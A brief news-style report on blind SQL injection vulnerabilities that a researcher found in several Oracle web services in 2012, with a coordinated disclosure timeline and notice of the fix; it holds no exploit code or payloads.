Blind SQL Injection Vulnerabilities reported to Oracle Corporation

Blind SQL Injection Vulnerabilities reported to Oracle Corporation

The well known Vulnerability Laboratory Researcher Shadab Siddiqui (23) from Indian has discovered this week a remote vulnerability with critical severity to oracle. Oracle Corporation (NASDAQ: ORCL) is an american multi-national computer technology corporation that specializes in developing and marketing computer hardware systems and enterprise software products – particularly database management systems.

Laboratory:

https://www.vulnerability-lab.com/show.php?user=Shadab%20Siddiqui

Shadab Siddiqui disovered multiple remote blind SQL Injection vulnerabilities on different parts of the Oracle web infrastructure. The vulnerability allows an attacker (remote) to inject/execute own sql commands on the affected application dbms. Successful exploitation of the vulnerability results in dbms, service & application compromise. The vulnerabilities are located on the shop, campus, education & academy service of oracle.

Affected Service(s):

[+] https://shop.oracle.com

[+] https://campus.oracle.com

[+] https://education.oracle.com

[+] https://academy.oracle.com

With coordination of the oracle security team (Steve M.) the issue has been fixed quickly on all instances of the different web service.

The hotfix on the web-servers has been released within 12 days after the issue has been analysed by oracle security & reported after the report of the vulnerability laboratory team.

[+] 2012-03-28: Vendor Notification

[+] 2012-03-29: Vendor Response/Feedback

[+] 2012-04-11: Vendor Fix/Patch

[+] 2012-04-12: Public or Non-Public Disclosure

Advisory: https://www.vulnerability-lab.com/get_content.php?id=478

Press/News: http://news.softpedia.com/news/Oracle-Fixes-SQL-Injection-Flaws-on-its-Public-Sites-264140.shtml